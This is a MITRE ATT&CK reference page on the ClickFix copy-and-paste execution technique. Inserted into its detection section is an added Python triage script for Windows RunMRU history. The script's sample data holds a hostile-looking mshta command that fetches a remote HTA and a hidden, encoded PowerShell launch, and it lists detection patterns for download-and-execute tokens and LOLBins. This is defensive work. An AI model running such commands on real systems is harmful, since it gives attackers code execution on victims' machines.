User Execution: Malicious Copy and Paste, Sub-technique T1204.004 - Enterprise | MITRE ATT&CK®
Currently viewing ATT&CK v17.1, which was live between April 22, 2025 and October 27, 2025.
User Execution: Malicious Copy and Paste
Other sub-techniques of User Execution (4):

T1204.001 Malicious Link
T1204.002 Malicious File
T1204.003 Malicious Image
T1204.004 Malicious Copy and Paste
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine. [1][2][3][4]

Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution. [5][6]

Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
ID: T1204.004
Sub-technique of: T1204
Tactic: Execution
Platforms: Linux, Windows, macOS
Contributors: Ale Houspanossian; Fernando Bacchin; Gabriel Currie; Harikrishnan Muthu, Cyble; Menachem Goldstein; ReliaQuest; SeungYoul Yoo, Ahn Lab
Version: 1.0
Created: 18 March 2025
Last Modified: 30 April 2025
Mitigations

M1038 Execution Prevention: Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements, such as those used to execute arbitrary Windows APIs or files (e.g., Add-Type). [7]

M1031 Network Intrusion Prevention: If a link is being requested by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.

M1021 Restrict Web-Based Content: If a link is being requested by a user, block unknown or unused file types in transit by default, or by policy from suspicious sites, as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc.
Detection
DS0017 Command / Command Execution: Detect commands triggered by users that may download malicious files. Items typed into the Windows Run dialog are saved for each user in the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU Registry key. [8]
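The RunMRU key above is a cheap place to look for pasted commands after the fact. The following is an added example, not code from the ATT&CK page or from MITRE: it decodes RunMRU-style values from a constructed dictionary (on a live host you would read the key with winreg or a reg.exe export) and flags entries that look like ClickFix-style pastes. The assumed layout is the one documented in [8]: an MRUList value listing entry letters newest-first, and one value per letter holding the typed text followed by a literal "\1" trailer. The heuristics (encoded PowerShell, hidden window, LOLBin with a remote URL, download/eval tokens) are this example's own choices, not an official detection.

```python
"""Decode Windows Run-dialog history (RunMRU) and flag pasted-command patterns.

Added example; not part of the ATT&CK page. SAMPLE_RUNMRU is constructed
data, not real telemetry. Assumed layout: 'MRUList' lists entry letters
newest-first; each lettered value is '<typed text>\\1'.
"""
import base64
import re

# -e/-ec/-enc/-encodedcommand followed by a base64 blob (PowerShell syntax)
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Binaries commonly paired with a URL in pasted one-liners (heuristic list)
LOLBINS = ("mshta", "rundll32", "regsvr32", "certutil", "bitsadmin", "curl",
           "wscript", "cscript", "msiexec")
URL_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)  # http(s) URL or UNC path
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "frombase64string", "invoke-webrequest", "irm ", "iwr ")


def _enc(ps: str) -> str:
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample of what RunMRU might hold after a user pasted a "fix";
# the address is from the TEST-NET-3 range and the encoded payload is harmless.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta http://203.0.113.7/verify.hta\\1",
    "c": "powershell -w hidden -enc " + _enc("Write-Output 'constructed sample'") + "\\1",
}


def parse_runmru(values):
    """Return the typed Run-dialog entries, most recent first, without the '\\1' trailer."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        entries.append(raw[:-2] if raw.endswith("\\1") else raw)
    return entries


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd):
    """Return a list of human-readable reasons the command looks suspicious (empty if none)."""
    reasons = []
    low = cmd.lower()
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command (decoded: %r)" % decoded)
        low += " " + decoded.lower()  # scan the decoded text with the same rules
    if re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", low):
        reasons.append("hidden window requested")
    if any(b in low for b in LOLBINS) and URL_RE.search(cmd):
        reasons.append("LOLBin invoked with a remote URL/UNC path")
    hits = [t for t in SUSPICIOUS_TOKENS if t in low]
    if hits:
        reasons.append("download/eval tokens: " + ", ".join(hits))
    return reasons


def triage(values):
    """Score every RunMRU entry; return only the ones with at least one reason."""
    findings = []
    for cmd in parse_runmru(values):
        reasons = score_command(cmd)
        if reasons:
            findings.append({"command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f["command"])
        for r in f["reasons"]:
            print("   -", r)
```

Two of the three constructed entries are flagged (the encoded, hidden-window PowerShell launch and the mshta call with a URL); the plain notepad entry is not. Because RunMRU is per-user and survives reboots, it is worth collecting alongside the process-creation telemetry in the rows that follow, which capture the same command only if the process was logged at the time.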
DS0022 File / File Creation: Monitor for files created on a system after a user executes an unusual command. Look for common download paths and suspicious files with executable extensions.
DS0029 Network Traffic / Network Connection Creation: Monitor network traffic patterns associated with user actions, such as initiating connections to suspicious sites.

DS0029 Network Traffic / Network Traffic Content: Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to malicious actors). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments.
DS0009 Process / Process Creation: Identify processes spawned by user actions that could lead to malicious execution.
References

[1] CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.
[2] Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
[3] Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.
[4] AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.
[5] Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.
[6] AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.
[7] PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.
[8] Shlomi Boutnaru. (2024, January 1). The Windows Forensics Journey — Run MRU (Run Dialog Box Most Recently Used). Retrieved April 14, 2025.